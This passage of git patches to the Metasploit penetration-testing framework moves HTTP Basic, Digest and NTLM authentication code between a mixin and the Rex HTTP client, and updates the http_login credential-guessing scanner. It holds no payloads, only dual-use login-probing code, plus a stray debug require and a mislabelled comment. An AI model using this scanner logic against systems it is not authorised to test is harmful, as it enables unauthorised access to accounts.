NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) + + challenge_key = blob_data[:challenge_key] + server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error + default_name = blob_data[:default_name] || '' #netbios name + default_domain = blob_data[:default_domain] || '' #netbios domain + dns_host_name = blob_data[:dns_host_name] || '' #dns name + dns_domain_name = blob_data[:dns_domain_name] || '' #dns domain + chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' #Client time + + spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost} + + resp_lm, resp_ntlm, client_challenge, ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses( + opts['username'], + opts['password'], + challenge_key, + domain_name, + default_name, + default_domain, + dns_host_name, + dns_domain_name, + chall_MsvAvTimestamp, + spnopt, + ntlm_options + ) + + ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth( + domain_name, + workstation_name, + opts['username'], + resp_lm, + resp_ntlm, + '', + ntlmssp_flags + ) + + ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) + + # Send the response + opts['headers']['Authorization'] = "#{provider}#{ntlm_message_3}" + r = c.request_cgi(opts) + resp = c.send_recv(r, to, true) + unless resp.kind_of? Rex::Proto::Http::Response + return nil + end + return resp + + rescue ::Errno::EPIPE, ::Timeout::Error + return nil + end + end + ## # # Wrappers for getters @@ -722,4 +785,4 @@ def make_cnonce end -end +end \ No newline at end of file From 5814c5962083a63567cc7cf094f2c58d73954662 Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Wed, 30 Jan 2013 12:42:46 -0600 Subject: [PATCH 230/421] move httpauth to mixin HttpAuth stuff gets it's own little mixin mix it in to Exploit::Http::Client mix in it to Auxiliary::Web::HTTP --- lib/msf/core/auxiliary/web/http.rb | 19 ++ lib/msf/core/exploit/http/client.rb | 265 +------------------ lib/msf/core/exploit/mixins.rb | 2 + modules/auxiliary/scanner/http/http_login.rb | 11 +- 4 files changed, 29 insertions(+), 268 deletions(-) diff --git a/lib/msf/core/auxiliary/web/http.rb b/lib/msf/core/auxiliary/web/http.rb index 0a59187c02f2..ffb0385d36f0 100644 --- a/lib/msf/core/auxiliary/web/http.rb +++ b/lib/msf/core/auxiliary/web/http.rb @@ -10,6 +10,8 @@ module Msf class Auxiliary::Web::HTTP + include Exploit::Remote::HttpAuth + class Request attr_accessor :url attr_reader :opts @@ -147,6 +149,23 @@ def request( url, opts = {} ) while rlimit >= 0 rlimit -= 1 res = _request( url, opts ) + if res.code == 401 and res.headers['WWW-Authenticate'] and opts['username'] + if res.headers['WWW-Authenticate'].include? 'Basic' + opts['password']||= '' + opts['basic_auth'] = opts['username'] + ":" + opts['password'] + res = _request( url, opts ) + elsif res.headers['WWW-Authenticate'].include? 'Digest' + opts['DigestAuthUser'] = opts['username'] + opts['DigestAuthPassword'] = opts['password'] + res = send_digest_request_cgi(opts,timeout) + elsif res.headers['WWW-Authenticate'].include? "Negotiate" + opts['provider'] = 'Negotiate' + res = send_request_auth_negotiate(opts,timeout) + elsif res.headers['WWW-Authenticate'].include? "NTLM" + opts['provider'] = 'NTLM' + res = send_request_auth_negotiate(opts,timeout) + end + end return res if !opts[:follow_redirect] || !url = res.headers['location'] end nil diff --git a/lib/msf/core/exploit/http/client.rb b/lib/msf/core/exploit/http/client.rb index 4608b38416a4..b5df69ba248c 100644 --- a/lib/msf/core/exploit/http/client.rb +++ b/lib/msf/core/exploit/http/client.rb @@ -16,6 +16,7 @@ module Msf module Exploit::Remote::HttpClient include Msf::Auxiliary::Report include Exploit::Remote::NTLM::Client + include Exploit::Remote::HttpAuth # # Constants @@ -273,151 +274,6 @@ def send_request_cgi(opts={}, timeout = 20) end end - # - # Combine the user/pass into an auth string for the HTTP Client - # - def basic_auth - return if not datastore['BasicAuthUser'] - datastore['BasicAuthUser'] + ":" + (datastore['BasicAuthPass'] || '') - end - - def send_digest_request_cgi(opts={}, timeout=20) - @nonce_count = 0 - - return [nil,nil] if not (datastore['DigestAuthUser'] or opts['DigestAuthUser']) - to = opts['timeout'] || timeout - - digest_user = datastore['DigestAuthUser'] || opts['DigestAuthUser'] || "" - digest_password = datastore['DigestAuthPassword'] || opts['DigestAuthPassword'] || "" - - method = opts['method'] - path = opts['uri'] - iis = true - if (opts['DigestAuthIIS'] == false or datastore['DigestAuthIIS'] == false) - iis = false - end - - begin - @nonce_count += 1 - - resp = opts['response'] - - if not resp - # Get authentication-challenge from server, and read out parameters required - c = connect(opts) - r = c.request_cgi(opts.merge({ - 'uri' => path, - 'method' => method })) - resp = c.send_recv(r, to) - unless resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - return [nil,nil] if resp.code == 404 - if resp.code != 401 - return resp - end - return [nil,nil] unless resp.headers['WWW-Authenticate'] - end - - # Don't anchor this regex to the beginning of string because header - # folding makes it appear later when the server presents multiple - # WWW-Authentication options (such as is the case with IIS configured - # for Digest or NTLM). - resp['www-authenticate'] =~ /Digest (.*)/ - - parameters = {} - $1.split(/,[[:space:]]*/).each do |p| - k, v = p.split("=", 2) - parameters[k] = v.gsub('"', '') - end - - qop = parameters['qop'] - - if parameters['algorithm'] =~ /(.*?)(-sess)?$/ - algorithm = case $1 - when 'MD5' then Digest::MD5 - when 'SHA1' then Digest::SHA1 - when 'SHA2' then Digest::SHA2 - when 'SHA256' then Digest::SHA256 - when 'SHA384' then Digest::SHA384 - when 'SHA512' then Digest::SHA512 - when 'RMD160' then Digest::RMD160 - else raise Error, "unknown algorithm \"#{$1}\"" - end - algstr = parameters["algorithm"] - sess = $2 - else - algorithm = Digest::MD5 - algstr = "MD5" - sess = false - end - - a1 = if sess then - [ - algorithm.hexdigest("#{digest_user}:#{parameters['realm']}:#{digest_password}"), - parameters['nonce'], - @cnonce - ].join ':' - else - "#{digest_user}:#{parameters['realm']}:#{digest_password}" - end - - ha1 = algorithm.hexdigest(a1) - ha2 = algorithm.hexdigest("#{method}:#{path}") - - request_digest = [ha1, parameters['nonce']] - request_digest.push(('%08x' % @nonce_count), @cnonce, qop) if qop - request_digest << ha2 - request_digest = request_digest.join ':' - - # Same order as IE7 - auth = [ - "Digest username=\"#{digest_user}\"", - "realm=\"#{parameters['realm']}\"", - "nonce=\"#{parameters['nonce']}\"", - "uri=\"#{path}\"", - "cnonce=\"#{@cnonce}\"", - "nc=#{'%08x' % @nonce_count}", - "algorithm=#{algstr}", - "response=\"#{algorithm.hexdigest(request_digest)[0, 32]}\"", - # The spec says the qop value shouldn't be enclosed in quotes, but - # some versions of IIS require it and Apache accepts it. Chrome - # and Firefox both send it without quotes but IE does it this way. - # Use the non-compliant-but-everybody-does-it to be as compatible - # as possible by default. The user can override if they don't like - # it. - if qop.nil? then - elsif iis then - "qop=\"#{qop}\"" - else - "qop=#{qop}" - end, - if parameters.key? 'opaque' then - "opaque=\"#{parameters['opaque']}\"" - end - ].compact - - headers ={ 'Authorization' => auth.join(', ') } - headers.merge!(opts['headers']) if opts['headers'] - - - # Send main request with authentication - r = c.request_cgi(opts.merge({ - 'uri' => path, - 'method' => method, - 'headers' => headers })) - resp = c.send_recv(r, to) - unless resp.kind_of? Rex::Proto::Http::Response - return [nil,nil] - end - - return [resp,c] - - rescue ::Errno::EPIPE, ::Timeout::Error - end - end - - # # Authenticates to the remote host based on the most appropriate authentication method, # and returns the HTTP response. If there are multiple auth methods supported, then it @@ -435,6 +291,7 @@ def send_request_smart_auth(opts={}, timeout=20) return res unless res.headers['WWW-Authenticate'] if res.headers['WWW-Authenticate'].include? "Basic" + opts['password']||= '' opts['basic_auth'] = opts['username'] + ":" + opts['password'] res = send_request_cgi(opts,timeout) return res @@ -442,7 +299,7 @@ def send_request_smart_auth(opts={}, timeout=20) elsif res.headers['WWW-Authenticate'].include? "Digest" opts['DigestAuthUser'] = opts['username'] opts['DigestAuthPassword'] = opts['password'] - res, c = send_digest_request_cgi(opts,timeout) + res = send_digest_request_cgi(opts,timeout) return res elsif res.headers['WWW-Authenticate'].include? "Negotiate" @@ -461,122 +318,6 @@ def send_request_smart_auth(opts={}, timeout=20) end - # - # Handles both generic Negotiate and NTLM providers - # This does not send back the client, instead it expects that you will - # handshake for each request sent. While this does create additional - # overhead on the wire, it makes dealing with the requests much easier - # from a code point of view. - # - # Options: - # - method: HTTP method, default: GET - # - headers: HTTP headers as a hash - # - provider: HTTP authentication provider, default: 'NTLM ' - # - username: The username to authenticate as - # - password: The password to authenticate with - # - def send_request_auth_negotiate(opts ={}, timeout =20) - ntlm_options = { - :signing => false, - :usentlm2_session => datastore['NTLM::UseNTLM2_session'], - :use_ntlmv2 => datastore['NTLM::UseNTLMv2'], - :send_lm => datastore['NTLM::SendLM'], - :send_ntlm => datastore['NTLM::SendNTLM'] - } - - if opts['provider'] and opts['provider'].include? 'Negotiate' - provider = "Negotiate " - else - provider = 'NTLM ' - end - - opts['method']||= 'GET' - opts['headers']||= {} - - ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) - workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) - domain_name = datastore['DOMAIN'] - - b64_blob = Rex::Text::encode_base64( - NTLM_UTILS::make_ntlmssp_blob_init( - domain_name, - workstation_name, - ntlmssp_flags - )) - - ntlm_message_1 = provider + b64_blob - to = opts['timeout'] || timeout - - begin - c = connect(opts) - - # First request to get the challenge - opts['headers']['Authorization'] = ntlm_message_1 - r = c.request_cgi(opts) - resp = c.send_recv(r, to) - unless resp.kind_of? Rex::Proto::Http::Response - return nil - end - - return resp unless resp.code == 401 && resp.headers['WWW-Authenticate'] - - # Get the challenge and craft the response - ntlm_challenge = resp.headers['WWW-Authenticate'].scan(/#{provider}([A-Z0-9\x2b\x2f=]+)/i).flatten[0] - return resp unless ntlm_challenge - - ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) - blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) - - challenge_key = blob_data[:challenge_key] - server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error - default_name = blob_data[:default_name] || '' #netbios name - default_domain = blob_data[:default_domain] || '' #netbios domain - dns_host_name = blob_data[:dns_host_name] || '' #dns name - dns_domain_name = blob_data[:dns_domain_name] || '' #dns domain - chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' #Client time - - spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost} - - resp_lm, resp_ntlm, client_challenge, ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses( - opts['username'], - opts['password'], - challenge_key, - domain_name, - default_name, - default_domain, - dns_host_name, - dns_domain_name, - chall_MsvAvTimestamp, - spnopt, - ntlm_options - ) - - ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth( - domain_name, - workstation_name, - opts['username'], - resp_lm, - resp_ntlm, - '', - ntlmssp_flags - ) - - ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) - - # Send the response - opts['headers']['Authorization'] = "#{provider}#{ntlm_message_3}" - r = c.request_cgi(opts) - resp = c.send_recv(r, to, true) - unless resp.kind_of? Rex::Proto::Http::Response - return nil - end - return resp - - rescue ::Errno::EPIPE, ::Timeout::Error - return nil - end - end - ## # # Wrappers for getters diff --git a/lib/msf/core/exploit/mixins.rb b/lib/msf/core/exploit/mixins.rb index 0e10f7a5a26c..6e45892469bf 100644 --- a/lib/msf/core/exploit/mixins.rb +++ b/lib/msf/core/exploit/mixins.rb @@ -37,6 +37,7 @@ require 'msf/core/exploit/tftp' require 'msf/core/exploit/telnet' require 'msf/core/exploit/ftpserver' +require 'msf/core/exploit/http/auth' require 'msf/core/exploit/http/client' require 'msf/core/exploit/http/server' require 'msf/core/exploit/smtp' @@ -94,3 +95,4 @@ # WebApp require 'msf/core/exploit/web' + diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index 5a6b0ab9a617..570ed26c28a4 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb @@ -204,12 +204,11 @@ def do_http_login(user,pass,scheme) def do_http_auth_ntlm(user,pass) begin - resp,c = send_http_auth_ntlm( + resp = send_request_auth_negotiate( 'uri' => @uri, 'username' => user, 'password' => pass ) - c.close return :abort if (resp.code == 404) if [200, 301, 302].include?(resp.code) @@ -262,7 +261,7 @@ def do_http_auth_digest(user,pass,requesttype) path = datastore['AUTH_URI'] || "/" begin if requesttype == "PUT" - res,c = send_digest_request_cgi({ + res= send_digest_request_cgi({ 'uri' => path, 'method' => requesttype, 'data' => 'Test123\r\n', @@ -271,7 +270,7 @@ def do_http_auth_digest(user,pass,requesttype) 'DigestAuthPassword' => pass }, 25) elsif requesttype == "PROPFIND" - res,c = send_digest_request_cgi({ + res = send_digest_request_cgi({ 'uri' => path, 'method' => requesttype, 'data' => '<?xml version="1.0" encoding="utf-8"?><D:propfind xmlns:D="DAV:"><D:allprop/></D:propfind>', @@ -281,7 +280,7 @@ def do_http_auth_digest(user,pass,requesttype) 'headers' => { 'Depth' => '0'} }, 25) else - res,c = send_digest_request_cgi({ + res= send_digest_request_cgi({ 'uri' => path, 'method' => requesttype, #'DigestAuthIIS' => false, @@ -300,7 +299,7 @@ def do_http_auth_digest(user,pass,requesttype) if ( [200, 301, 302].include?(res.code) ) or (res.code == 201) if ((res.code == 201) and (requesttype == "PUT")) print_good("Trying to delete #{path}") - del_res,c = send_digest_request_cgi({ + del_res = send_digest_request_cgi({ 'uri' => path, 'method' => 'DELETE', 'DigestAuthUser' => user, From c407fa9e74cb224eb1fd3390807084bcb6671b52 Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Wed, 30 Jan 2013 16:37:32 -0600 Subject: [PATCH 231/421] add mixjn --- lib/msf/core/exploit/http/auth.rb | 279 ++++++++++++++++++++++++++++++ 1 file changed, 279 insertions(+) create mode 100644 lib/msf/core/exploit/http/auth.rb diff --git a/lib/msf/core/exploit/http/auth.rb b/lib/msf/core/exploit/http/auth.rb new file mode 100644 index 000000000000..aa707eddde25 --- /dev/null +++ b/lib/msf/core/exploit/http/auth.rb @@ -0,0 +1,279 @@ + + +module Msf + +### +# +# This module provides methods for exploiting an HTTP client by acting +# as an HTTP server. +# +### +module Exploit::Remote::HttpAuth + + + # + # Combine the user/pass into an auth string for the HTTP Client + # + def basic_auth + return if not datastore['BasicAuthUser'] + datastore['BasicAuthUser'] + ":" + (datastore['BasicAuthPass'] || '') + end + # + # Handles both generic Negotiate and NTLM providers + # This does not send back the client, instead it expects that you will + # handshake for each request sent. While this does create additional + # overhead on the wire, it makes dealing with the requests much easier + # from a code point of view. + # + # Options: + # - method: HTTP method, default: GET + # - headers: HTTP headers as a hash + # - provider: HTTP authentication provider, default: 'NTLM ' + # - username: The username to authenticate as + # - password: The password to authenticate with + # + def send_request_auth_negotiate(opts ={}, timeout =20) + ntlm_options = { + :signing => false, + :usentlm2_session => datastore['NTLM::UseNTLM2_session'], + :use_ntlmv2 => datastore['NTLM::UseNTLMv2'], + :send_lm => datastore['NTLM::SendLM'], + :send_ntlm => datastore['NTLM::SendNTLM'] + } + + if opts['provider'] and opts['provider'].include? 'Negotiate' + provider = "Negotiate " + else + provider = 'NTLM ' + end + + opts['method']||= 'GET' + opts['headers']||= {} + + ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) + workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) + domain_name = datastore['DOMAIN'] + + b64_blob = Rex::Text::encode_base64( + NTLM_UTILS::make_ntlmssp_blob_init( + domain_name, + workstation_name, + ntlmssp_flags + )) + + ntlm_message_1 = provider + b64_blob + to = opts['timeout'] || timeout + + begin + c = connect(opts) + + # First request to get the challenge + opts['headers']['Authorization'] = ntlm_message_1 + r = c.request_cgi(opts) + resp = c.send_recv(r, to) + unless resp.kind_of? Rex::Proto::Http::Response + return nil + end + + return resp unless resp.code == 401 && resp.headers['WWW-Authenticate'] + + # Get the challenge and craft the response + ntlm_challenge = resp.headers['WWW-Authenticate'].scan(/#{provider}([A-Z0-9\x2b\x2f=]+)/i).flatten[0] + return resp unless ntlm_challenge + + ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) + blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) + + challenge_key = blob_data[:challenge_key] + server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error + default_name = blob_data[:default_name] || '' #netbios name + default_domain = blob_data[:default_domain] || '' #netbios domain + dns_host_name = blob_data[:dns_host_name] || '' #dns name + dns_domain_name = blob_data[:dns_domain_name] || '' #dns domain + chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' #Client time + + spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost} + + resp_lm, resp_ntlm, client_challenge, ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses( + opts['username'], + opts['password'], + challenge_key, + domain_name, + default_name, + default_domain, + dns_host_name, + dns_domain_name, + chall_MsvAvTimestamp, + spnopt, + ntlm_options + ) + + ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth( + domain_name, + workstation_name, + opts['username'], + resp_lm, + resp_ntlm, + '', + ntlmssp_flags + ) + + ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) + + # Send the response + opts['headers']['Authorization'] = "#{provider}#{ntlm_message_3}" + r = c.request_cgi(opts) + resp = c.send_recv(r, to, true) + unless resp.kind_of? Rex::Proto::Http::Response + return nil + end + c.close + return resp + + rescue ::Errno::EPIPE, ::Timeout::Error + return nil + end + end + + def send_digest_request_cgi(opts={}, timeout=20) + @nonce_count = 0 + + return [nil,nil] if not (datastore['DigestAuthUser'] or opts['DigestAuthUser']) + to = opts['timeout'] || timeout + + digest_user = datastore['DigestAuthUser'] || opts['DigestAuthUser'] || "" + digest_password = datastore['DigestAuthPassword'] || opts['DigestAuthPassword'] || "" + + method = opts['method'] + path = opts['uri'] + iis = true + if (opts['DigestAuthIIS'] == false or datastore['DigestAuthIIS'] == false) + iis = false + end + + begin + @nonce_count += 1 + + resp = opts['response'] + + if not resp + # Get authentication-challenge from server, and read out parameters required + c = connect(opts) + r = c.request_cgi(opts.merge({ + 'uri' => path, + 'method' => method })) + resp = c.send_recv(r, to) + unless resp.kind_of? Rex::Proto::Http::Response + return nil + end + + if resp.code != 401 + return resp + end + return resp unless resp.headers['WWW-Authenticate'] + end + + # Don't anchor this regex to the beginning of string because header + # folding makes it appear later when the server presents multiple + # WWW-Authentication options (such as is the case with IIS configured + # for Digest or NTLM). + resp['www-authenticate'] =~ /Digest (.*)/ + + parameters = {} + $1.split(/,[[:space:]]*/).each do |p| + k, v = p.split("=", 2) + parameters[k] = v.gsub('"', '') + end + + qop = parameters['qop'] + + if parameters['algorithm'] =~ /(.*?)(-sess)?$/ + algorithm = case $1 + when 'MD5' then Digest::MD5 + when 'SHA1' then Digest::SHA1 + when 'SHA2' then Digest::SHA2 + when 'SHA256' then Digest::SHA256 + when 'SHA384' then Digest::SHA384 + when 'SHA512' then Digest::SHA512 + when 'RMD160' then Digest::RMD160 + else raise Error, "unknown algorithm \"#{$1}\"" + end + algstr = parameters["algorithm"] + sess = $2 + else + algorithm = Digest::MD5 + algstr = "MD5" + sess = false + end + + a1 = if sess then + [ + algorithm.hexdigest("#{digest_user}:#{parameters['realm']}:#{digest_password}"), + parameters['nonce'], + @cnonce + ].join ':' + else + "#{digest_user}:#{parameters['realm']}:#{digest_password}" + end + + ha1 = algorithm.hexdigest(a1) + ha2 = algorithm.hexdigest("#{method}:#{path}") + + request_digest = [ha1, parameters['nonce']] + request_digest.push(('%08x' % @nonce_count), @cnonce, qop) if qop + request_digest << ha2 + request_digest = request_digest.join ':' + + # Same order as IE7 + auth = [ + "Digest username=\"#{digest_user}\"", + "realm=\"#{parameters['realm']}\"", + "nonce=\"#{parameters['nonce']}\"", + "uri=\"#{path}\"", + "cnonce=\"#{@cnonce}\"", + "nc=#{'%08x' % @nonce_count}", + "algorithm=#{algstr}", + "response=\"#{algorithm.hexdigest(request_digest)[0, 32]}\"", + # The spec says the qop value shouldn't be enclosed in quotes, but + # some versions of IIS require it and Apache accepts it. Chrome + # and Firefox both send it without quotes but IE does it this way. + # Use the non-compliant-but-everybody-does-it to be as compatible + # as possible by default. The user can override if they don't like + # it. + if qop.nil? then + elsif iis then + "qop=\"#{qop}\"" + else + "qop=#{qop}" + end, + if parameters.key? 'opaque' then + "opaque=\"#{parameters['opaque']}\"" + end + ].compact + + headers ={ 'Authorization' => auth.join(', ') } + headers.merge!(opts['headers']) if opts['headers'] + + + # Send main request with authentication + r = c.request_cgi(opts.merge({ + 'uri' => path, + 'method' => method, + 'headers' => headers })) + resp = c.send_recv(r, to) + unless resp.kind_of? Rex::Proto::Http::Response + return nil + end + + c.close + return resp + + rescue ::Errno::EPIPE, ::Timeout::Error + end + end + + + +end +end + From ef1fc58e5e1158391944c6dea9f16377c7468baf Mon Sep 17 00:00:00 2001 From: David Maloney <DMaloney@rapid7.com> Date: Thu, 31 Jan 2013 13:34:32 -0600 Subject: [PATCH 232/421] Remove mixin, start moving into Rex move auth awareness into rex itself --- lib/msf/core/auxiliary/web/http.rb | 1 - lib/msf/core/exploit/http/auth.rb | 279 --------------------------- lib/rex/proto/http/client.rb | 296 ++++++++++++++++++++++++++++- 3 files changed, 293 insertions(+), 283 deletions(-) delete mode 100644 lib/msf/core/exploit/http/auth.rb diff --git a/lib/msf/core/auxiliary/web/http.rb b/lib/msf/core/auxiliary/web/http.rb index ffb0385d36f0..0f88517176cb 100644 --- a/lib/msf/core/auxiliary/web/http.rb +++ b/lib/msf/core/auxiliary/web/http.rb @@ -10,7 +10,6 @@ module Msf class Auxiliary::Web::HTTP - include Exploit::Remote::HttpAuth class Request attr_accessor :url diff --git a/lib/msf/core/exploit/http/auth.rb b/lib/msf/core/exploit/http/auth.rb deleted file mode 100644 index aa707eddde25..000000000000 --- a/lib/msf/core/exploit/http/auth.rb +++ /dev/null @@ -1,279 +0,0 @@ - - -module Msf - -### -# -# This module provides methods for exploiting an HTTP client by acting -# as an HTTP server. -# -### -module Exploit::Remote::HttpAuth - - - # - # Combine the user/pass into an auth string for the HTTP Client - # - def basic_auth - return if not datastore['BasicAuthUser'] - datastore['BasicAuthUser'] + ":" + (datastore['BasicAuthPass'] || '') - end - # - # Handles both generic Negotiate and NTLM providers - # This does not send back the client, instead it expects that you will - # handshake for each request sent. While this does create additional - # overhead on the wire, it makes dealing with the requests much easier - # from a code point of view. - # - # Options: - # - method: HTTP method, default: GET - # - headers: HTTP headers as a hash - # - provider: HTTP authentication provider, default: 'NTLM ' - # - username: The username to authenticate as - # - password: The password to authenticate with - # - def send_request_auth_negotiate(opts ={}, timeout =20) - ntlm_options = { - :signing => false, - :usentlm2_session => datastore['NTLM::UseNTLM2_session'], - :use_ntlmv2 => datastore['NTLM::UseNTLMv2'], - :send_lm => datastore['NTLM::SendLM'], - :send_ntlm => datastore['NTLM::SendNTLM'] - } - - if opts['provider'] and opts['provider'].include? 'Negotiate' - provider = "Negotiate " - else - provider = 'NTLM ' - end - - opts['method']||= 'GET' - opts['headers']||= {} - - ntlmssp_flags = NTLM_UTILS.make_ntlm_flags(ntlm_options) - workstation_name = Rex::Text.rand_text_alpha(rand(8)+1) - domain_name = datastore['DOMAIN'] - - b64_blob = Rex::Text::encode_base64( - NTLM_UTILS::make_ntlmssp_blob_init( - domain_name, - workstation_name, - ntlmssp_flags - )) - - ntlm_message_1 = provider + b64_blob - to = opts['timeout'] || timeout - - begin - c = connect(opts) - - # First request to get the challenge - opts['headers']['Authorization'] = ntlm_message_1 - r = c.request_cgi(opts) - resp = c.send_recv(r, to) - unless resp.kind_of? Rex::Proto::Http::Response - return nil - end - - return resp unless resp.code == 401 && resp.headers['WWW-Authenticate'] - - # Get the challenge and craft the response - ntlm_challenge = resp.headers['WWW-Authenticate'].scan(/#{provider}([A-Z0-9\x2b\x2f=]+)/i).flatten[0] - return resp unless ntlm_challenge - - ntlm_message_2 = Rex::Text::decode_base64(ntlm_challenge) - blob_data = NTLM_UTILS.parse_ntlm_type_2_blob(ntlm_message_2) - - challenge_key = blob_data[:challenge_key] - server_ntlmssp_flags = blob_data[:server_ntlmssp_flags] #else should raise an error - default_name = blob_data[:default_name] || '' #netbios name - default_domain = blob_data[:default_domain] || '' #netbios domain - dns_host_name = blob_data[:dns_host_name] || '' #dns name - dns_domain_name = blob_data[:dns_domain_name] || '' #dns domain - chall_MsvAvTimestamp = blob_data[:chall_MsvAvTimestamp] || '' #Client time - - spnopt = {:use_spn => datastore['NTLM::SendSPN'], :name => self.rhost} - - resp_lm, resp_ntlm, client_challenge, ntlm_cli_challenge = NTLM_UTILS.create_lm_ntlm_responses( - opts['username'], - opts['password'], - challenge_key, - domain_name, - default_name, - default_domain, - dns_host_name, - dns_domain_name, - chall_MsvAvTimestamp, - spnopt, - ntlm_options - ) - - ntlm_message_3 = NTLM_UTILS.make_ntlmssp_blob_auth( - domain_name, - workstation_name, - opts['username'], - resp_lm, - resp_ntlm, - '', - ntlmssp_flags - ) - - ntlm_message_3 = Rex::Text::encode_base64(ntlm_message_3) - - # Send the response - opts['headers']['Authorization'] = "#{provider}#{ntlm_message_3}" - r = c.request_cgi(opts) - resp = c.send_recv(r, to, true) - unless resp.kind_of? Rex::Proto::Http::Response - return nil - end - c.close - return resp - - rescue ::Errno::EPIPE, ::Timeout::Error - return nil - end - end - - def send_digest_request_cgi(opts={}, timeout=20) - @nonce_count = 0 - - return [nil,nil] if not (datastore['DigestAuthUser'] or opts['DigestAuthUser']) - to = opts['timeout'] || timeout - - digest_user = datastore['DigestAuthUser'] || opts['DigestAuthUser'] || "" - digest_password = datastore['DigestAuthPassword'] || opts['DigestAuthPassword'] || "" - - method = opts['method'] - path = opts['uri'] - iis = true - if (opts['DigestAuthIIS'] == false or datastore['DigestAuthIIS'] == false) - iis = false - end - - begin - @nonce_count += 1 - - resp = opts['response'] - - if not resp - # Get authentication-challenge from server, and read out parameters required - c = connect(opts) - r = c.request_cgi(opts.merge({ - 'uri' => path, - 'method' => method })) - resp = c.send_recv(r, to) - unless resp.kind_of? Rex::Proto::Http::Response - return nil - end - - if resp.code != 401 - return resp - end - return resp unless resp.headers['WWW-Authenticate'] - end - - # Don't anchor this regex to the beginning of string because header - # folding makes it appear later when the server presents multiple - # WWW-Authentication options (such as is the case with IIS configured - # for Digest or NTLM). - resp['www-authenticate'] =~ /Digest (.*)/ - - parameters = {} - $1.split(/,[[:space:]]*/).each do |p| - k, v = p.split("=", 2) - parameters[k] = v.gsub('"', '') - end - - qop = parameters['qop'] - - if parameters['algorithm'] =~ /(.*?)(-sess)?$/ - algorithm = case $1 - when 'MD5' then Digest::MD5 - when 'SHA1' then Digest::SHA1 - when 'SHA2' then Digest::SHA2 - when 'SHA256' then Digest::SHA256 - when 'SHA384' then Digest::SHA384 - when 'SHA512' then Digest::SHA512 - when 'RMD160' then Digest::RMD160 - else raise Error, "unknown algorithm \"#{$1}\"" - end - algstr = parameters["algorithm"] - sess = $2 - else - algorithm = Digest::MD5 - algstr = "MD5" - sess = false - end - - a1 = if sess then - [ - algorithm.hexdigest("#{digest_user}:#{parameters['realm']}:#{digest_password}"), - parameters['nonce'], - @cnonce - ].join ':' - else - "#{digest_user}:#{parameters['realm']}:#{digest_password}" - end - - ha1 = algorithm.hexdigest(a1) - ha2 = algorithm.hexdigest("#{method}:#{path}") - - request_digest = [ha1, parameters['nonce']] - request_digest.push(('%08x' % @nonce_count), @cnonce, qop) if qop - request_digest << ha2 - request_digest = request_digest.join ':' - - # Same order as IE7 - auth = [ - "Digest username=\"#{digest_user}\"", - "realm=\"#{parameters['realm']}\"", - "nonce=\"#{parameters['nonce']}\"", - "uri=\"#{path}\"", - "cnonce=\"#{@cnonce}\"", - "nc=#{'%08x' % @nonce_count}", - "algorithm=#{algstr}", - "response=\"#{algorithm.hexdigest(request_digest)[0, 32]}\"", - # The spec says the qop value shouldn't be enclosed in quotes, but - # some versions of IIS require it and Apache accepts it. Chrome - # and Firefox both send it without quotes but IE does it this way. - # Use the non-compliant-but-everybody-does-it to be as compatible - # as possible by default. The user can override if they don't like - # it. - if qop.nil? then - elsif iis then - "qop=\"#{qop}\"" - else - "qop=#{qop}" - end, - if parameters.key? 'opaque' then - "opaque=\"#{parameters['opaque']}\"" - end - ].compact - - headers ={ 'Authorization' => auth.join(', ') } - headers.merge!(opts['headers']) if opts['headers'] - - - # Send main request with authentication - r = c.request_cgi(opts.merge({ - 'uri' => path, - 'method' => method, - 'headers' => headers })) - resp = c.send_recv(r, to) - unless resp.kind_of? Rex::Proto::Http::Response - return nil - end - - c.close - return resp - - rescue ::Errno::EPIPE, ::Timeout::Error - end - end - - - -end -end - diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index 0572ea02ffe4..ddc1d3b30e22 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -2,6 +2,7 @@ require 'rex/socket' require 'rex/proto/http' require 'rex/text' +require 'pry' module Rex module Proto @@ -21,13 +22,15 @@ class Client # # Creates a new client instance # - def initialize(host, port = 80, context = {}, ssl = nil, ssl_version = nil, proxies = nil) + def initialize(host, port = 80, context = {}, ssl = nil, ssl_version = nil, proxies = nil, username = '', password = '') self.hostname = host self.port = port.to_i self.context = context self.ssl = ssl self.ssl_version = ssl_version self.proxies = proxies + self.username = username + self.password = password self.config = { 'read_max_data' => (1024*1024*1), 'vhost' => self.hostname, @@ -61,7 +64,17 @@ def initialize(host, port = 80, context = {}, ssl = nil, ssl_version = nil, prox 